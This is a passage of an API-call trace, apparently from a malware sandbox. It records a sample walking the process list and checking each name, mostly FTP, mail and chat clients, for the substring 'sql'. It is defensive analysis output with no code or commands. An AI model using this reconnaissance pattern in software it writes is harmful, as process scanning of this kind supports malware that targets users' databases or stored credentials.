dwFlags=0x200, lpWideCharStr="gainedshape.exe", cchWideChar=-1, lpMultiByteStr=0x3571070, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="gainedshape.exe", lpUsedDefaultChar=0x0) returned 16 [0114.012] lstrcpyA (in: lpString1=0x567fabc, lpString2="gainedshape.exe" | out: lpString1="gainedshape.exe") returned="gainedshape.exe" [0114.013] StrStrIA (lpFirst="gainedshape.exe", lpSrch="sql") returned 0x0 [0114.013] Process32NextW (in: hSnapshot=0x370, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="opens-versions.exe")) returned 1 [0114.014] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="opens-versions.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0114.014] LocalAlloc (uFlags=0x40, uBytes=0x13) returned 0x357fb00 [0114.014] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="opens-versions.exe", cchWideChar=-1, lpMultiByteStr=0x357fb00, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="opens-versions.exe", lpUsedDefaultChar=0x0) returned 19 [0114.014] lstrcpyA (in: lpString1=0x567fabc, lpString2="opens-versions.exe" | out: lpString1="opens-versions.exe") returned="opens-versions.exe" [0114.014] StrStrIA (lpFirst="opens-versions.exe", lpSrch="sql") returned 0x0 [0114.014] Process32NextW (in: hSnapshot=0x370, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xddc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="workers_dedicated_alloy.exe")) returned 1 [0114.017] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="workers_dedicated_alloy.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 28 [0114.017] LocalAlloc (uFlags=0x40, uBytes=0x1c) returned 0x357ebb8 [0114.017] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="workers_dedicated_alloy.exe", cchWideChar=-1, lpMultiByteStr=0x357ebb8, cbMultiByte=28, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="workers_dedicated_alloy.exe", lpUsedDefaultChar=0x0) returned 28 [0114.017] lstrcpyA (in: lpString1=0x567fabc, lpString2="workers_dedicated_alloy.exe" | out: lpString1="workers_dedicated_alloy.exe") returned="workers_dedicated_alloy.exe" [0114.017] StrStrIA (lpFirst="workers_dedicated_alloy.exe", lpSrch="sql") returned 0x0 [0114.017] Process32NextW (in: hSnapshot=0x370, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x29c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0114.018] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="3dftp.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0114.018] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x3571058 [0114.018] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="3dftp.exe", cchWideChar=-1, lpMultiByteStr=0x3571058, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="3dftp.exe", lpUsedDefaultChar=0x0) returned 10 [0114.018] lstrcpyA (in: lpString1=0x567fabc, lpString2="3dftp.exe" | out: lpString1="3dftp.exe") returned="3dftp.exe" [0114.019] StrStrIA (lpFirst="3dftp.exe", lpSrch="sql") returned 0x0 [0114.019] Process32NextW (in: hSnapshot=0x370, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x888, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0114.020] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="absolutetelnet.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0114.020] LocalAlloc (uFlags=0x40, uBytes=0x13) returned 0x357fa00 [0114.020] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="absolutetelnet.exe", cchWideChar=-1, lpMultiByteStr=0x357fa00, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="absolutetelnet.exe", lpUsedDefaultChar=0x0) returned 19 [0114.020] lstrcpyA (in: lpString1=0x567fabc, lpString2="absolutetelnet.exe" | out: lpString1="absolutetelnet.exe") returned="absolutetelnet.exe" [0114.021] StrStrIA (lpFirst="absolutetelnet.exe", lpSrch="sql") returned 0x0 [0114.021] Process32NextW (in: hSnapshot=0x370, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x564, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0114.022] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="alftp.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0114.022] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x3571088 [0114.022] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="alftp.exe", cchWideChar=-1, lpMultiByteStr=0x3571088, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="alftp.exe", lpUsedDefaultChar=0x0) returned 10 [0114.022] lstrcpyA (in: lpString1=0x567fabc, lpString2="alftp.exe" | out: lpString1="alftp.exe") returned="alftp.exe" [0114.022] StrStrIA (lpFirst="alftp.exe", lpSrch="sql") returned 0x0 [0114.022] Process32NextW (in: hSnapshot=0x370, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0114.024] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="barca.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0114.024] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x3570da0 [0114.024] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="barca.exe", cchWideChar=-1, lpMultiByteStr=0x3570da0, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="barca.exe", lpUsedDefaultChar=0x0) returned 10 [0114.024] lstrcpyA (in: lpString1=0x567fabc, lpString2="barca.exe" | out: lpString1="barca.exe") returned="barca.exe" [0114.024] StrStrIA (lpFirst="barca.exe", lpSrch="sql") returned 0x0 [0114.024] Process32NextW (in: hSnapshot=0x370, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe08, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0114.025] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="bitkinex.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0114.025] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x3570db8 [0114.025] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="bitkinex.exe", cchWideChar=-1, lpMultiByteStr=0x3570db8, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bitkinex.exe", lpUsedDefaultChar=0x0) returned 13 [0114.026] lstrcpyA (in: lpString1=0x567fabc, lpString2="bitkinex.exe" | out: lpString1="bitkinex.exe") returned="bitkinex.exe" [0114.026] StrStrIA (lpFirst="bitkinex.exe", lpSrch="sql") returned 0x0 [0114.026] Process32NextW (in: hSnapshot=0x370, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xca4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0114.027] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="coreftp.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0114.027] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3571118 [0114.027] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="coreftp.exe", cchWideChar=-1, lpMultiByteStr=0x3571118, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="coreftp.exe", lpUsedDefaultChar=0x0) returned 12 [0114.027] lstrcpyA (in: lpString1=0x567fabc, lpString2="coreftp.exe" | out: lpString1="coreftp.exe") returned="coreftp.exe" [0114.027] StrStrIA (lpFirst="coreftp.exe", lpSrch="sql") returned 0x0 [0114.027] Process32NextW (in: hSnapshot=0x370, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0114.029] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="far.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0114.034] LocalAlloc (uFlags=0x40, uBytes=0x8) returned 0x357e298 [0114.034] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="far.exe", cchWideChar=-1, lpMultiByteStr=0x357e298, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="far.exe", lpUsedDefaultChar=0x0) returned 8 [0114.035] lstrcpyA (in: lpString1=0x567fabc, lpString2="far.exe" | out: lpString1="far.exe") returned="far.exe" [0114.035] StrStrIA (lpFirst="far.exe", lpSrch="sql") returned 0x0 [0114.035] Process32NextW (in: hSnapshot=0x370, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd34, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0114.036] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="filezilla.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0114.036] LocalAlloc (uFlags=0x40, uBytes=0xe) returned 0x3571130 [0114.036] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="filezilla.exe", cchWideChar=-1, lpMultiByteStr=0x3571130, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="filezilla.exe", lpUsedDefaultChar=0x0) returned 14 [0114.036] lstrcpyA (in: lpString1=0x567fabc, lpString2="filezilla.exe" | out: lpString1="filezilla.exe") returned="filezilla.exe" [0114.036] StrStrIA (lpFirst="filezilla.exe", lpSrch="sql") returned 0x0 [0114.036] Process32NextW (in: hSnapshot=0x370, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0114.038] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="flashfxp.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0114.038] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x35711d8 [0114.038] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="flashfxp.exe", cchWideChar=-1, lpMultiByteStr=0x35711d8, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="flashfxp.exe", lpUsedDefaultChar=0x0) returned 13 [0114.038] lstrcpyA (in: lpString1=0x567fabc, lpString2="flashfxp.exe" | out: lpString1="flashfxp.exe") returned="flashfxp.exe" [0114.038] StrStrIA (lpFirst="flashfxp.exe", lpSrch="sql") returned 0x0 [0114.038] Process32NextW (in: hSnapshot=0x370, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x258, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0114.040] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="fling.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0114.040] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x3571310 [0114.040] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="fling.exe", cchWideChar=-1, lpMultiByteStr=0x3571310, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="fling.exe", lpUsedDefaultChar=0x0) returned 10 [0114.040] lstrcpyA (in: lpString1=0x567fabc, lpString2="fling.exe" | out: lpString1="fling.exe") returned="fling.exe" [0114.040] StrStrIA (lpFirst="fling.exe", lpSrch="sql") returned 0x0 [0114.040] Process32NextW (in: hSnapshot=0x370, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x394, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0114.041] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="foxmailincmail.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0114.041] LocalAlloc (uFlags=0x40, uBytes=0x13) returned 0x357fa20 [0114.041] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="foxmailincmail.exe", cchWideChar=-1, lpMultiByteStr=0x357fa20, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="foxmailincmail.exe", lpUsedDefaultChar=0x0) returned 19 [0114.041] lstrcpyA (in: lpString1=0x567fabc, lpString2="foxmailincmail.exe" | out: lpString1="foxmailincmail.exe") returned="foxmailincmail.exe" [0114.041] StrStrIA (lpFirst="foxmailincmail.exe", lpSrch="sql") returned 0x0 [0114.041] Process32NextW (in: hSnapshot=0x370, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0114.043] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="gmailnotifierpro.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0114.043] LocalAlloc (uFlags=0x40, uBytes=0x15) returned 0x357fac0 [0114.043] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="gmailnotifierpro.exe", cchWideChar=-1, lpMultiByteStr=0x357fac0, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="gmailnotifierpro.exe", lpUsedDefaultChar=0x0) returned 21 [0114.043] lstrcpyA (in: lpString1=0x567fabc, lpString2="gmailnotifierpro.exe" | out: lpString1="gmailnotifierpro.exe") returned="gmailnotifierpro.exe" [0114.043] StrStrIA (lpFirst="gmailnotifierpro.exe", lpSrch="sql") returned 0x0 [0114.043] Process32NextW (in: hSnapshot=0x370, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0114.044] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="icq.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0114.044] LocalAlloc (uFlags=0x40, uBytes=0x8) returned 0x357e108 [0114.044] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="icq.exe", cchWideChar=-1, lpMultiByteStr=0x357e108, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="icq.exe", lpUsedDefaultChar=0x0) returned 8 [0114.045] lstrcpyA (in: lpString1=0x567fabc, lpString2="icq.exe" | out: lpString1="icq.exe") returned="icq.exe" [0114.045] StrStrIA (lpFirst="icq.exe", lpSrch="sql") returned 0x0 [0114.045] Process32NextW (in: hSnapshot=0x370, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0114.046] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="leechftp.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0114.046] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x3571370 [0114.046] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="leechftp.exe", cchWideChar=-1, lpMultiByteStr=0x3571370, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="leechftp.exe", lpUsedDefaultChar=0x0) returned 13 [0114.046] lstrcpyA (in: lpString1=0x567fabc, lpString2="leechftp.exe" | out: lpString1="leechftp.exe") returned="leechftp.exe" [0114.046] StrStrIA (lpFirst="leechftp.exe", lpSrch="sql") returned 0x0 [0114.046] Process32NextW (in: hSnapshot=0x370, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x908, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0114.048] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="ncftp.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0114.048] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x3571328 [0114.048] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="ncftp.exe", cchWideChar=-1, lpMultiByteStr=0x3571328, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ncftp.exe", lpUsedDefaultChar=0x0) returned 10 [0114.048] lstrcpyA (in: lpString1=0x567fabc, lpString2="ncftp.exe" | out: lpString1="ncftp.exe") returned="ncftp.exe" [0114.048] StrStrIA (lpFirst="ncftp.exe", lpSrch="sql") returned 0x0 [0114.048] Process32NextW (in: hSnapshot=0x370, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0114.049] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="notepad.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0114.049] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3571160 [0114.049] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="notepad.exe", cchWideChar=-1, lpMultiByteStr=0x3571160, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="notepad.exe", lpUsedDefaultChar=0x0) returned 12 [0114.049] lstrcpyA (in: lpString1=0x567fabc, lpString2="notepad.exe" | out: lpString1="notepad.exe") returned="notepad.exe" [0114.049] StrStrIA (lpFirst="notepad.exe", lpSrch="sql") returned 0x0 [0114.049] Process32NextW (in: hSnapshot=0x370, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xda4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0114.192] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="operamail.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0114.192] LocalAlloc (uFlags=0x40, uBytes=0xe) returned 0x35712f8 [0114.192] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="operamail.exe", cchWideChar=-1, lpMultiByteStr=0x35712f8, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="operamail.exe", lpUsedDefaultChar=0x0) returned 14 [0114.192] lstrcpyA (in: lpString1=0x567fabc, lpString2="operamail.exe" | out: lpString1="operamail.exe") returned="operamail.exe" [0114.192] StrStrIA (lpFirst="operamail.exe", lpSrch="sql") returned 0x0 [0114.192] Process32NextW (in: hSnapshot=0x370, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x42c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0114.194] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="pidgin.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0114.194] LocalAlloc (uFlags=0x40, uBytes=0xb) returned 0x35711a8 [0114.194] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="pidgin.exe", cchWideChar=-1, lpMultiByteStr=0x35711a8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="pidgin.exe", lpUsedDefaultChar=0x0) returned 11 [0114.194] lstrcpyA (in: lpString1=0x567fabc, lpString2="pidgin.exe" | out: lpString1="pidgin.exe") returned="pidgin.exe" [0114.194] StrStrIA (lpFirst="pidgin.exe", lpSrch="sql") returned 0x0 [0114.194] Process32NextW (in: hSnapshot=0x370, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xecc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0114.195] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="scriptftp.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0114.195] LocalAlloc (uFlags=0x40, uBytes=0xe) returned 0x35711f0 [0114.195] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="scriptftp.exe", cchWideChar=-1, lpMultiByteStr=0x35711f0, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="scriptftp.exe", lpUsedDefaultChar=0x0) returned 14 [0114.196] lstrcpyA (in: lpString1=0x567fabc, lpString2="scriptftp.exe" | out: lpString1="scriptftp.exe") returned="scriptftp.exe" [0114.196] StrStrIA (lpFirst="scriptftp.exe", lpSrch="sql") returned 0x0 [0114.196] Process32NextW (in: hSnapshot=0x370, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xec4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0114.197] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="skype.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0114.197] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x3571388 [0114.197] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="skype.exe", cchWideChar=-1, lpMultiByteStr=0x3571388, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="skype.exe", lpUsedDefaultChar=0x0) returned 10 [0114.197] lstrcpyA (in: lpString1=0x567fabc, lpString2="skype.exe" | out: lpString1="skype.exe") returned="skype.exe" [0114.197] StrStrIA (lpFirst="skype.exe", lpSrch="sql") returned 0x0 [0114.197] Process32NextW (in: hSnapshot=0x370, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0114.199] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="smartftp.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0114.199] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x3571238 [0114.199] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="smartftp.exe", cchWideChar=-1, lpMultiByteStr=0x3571238, cbMultiByte=13, 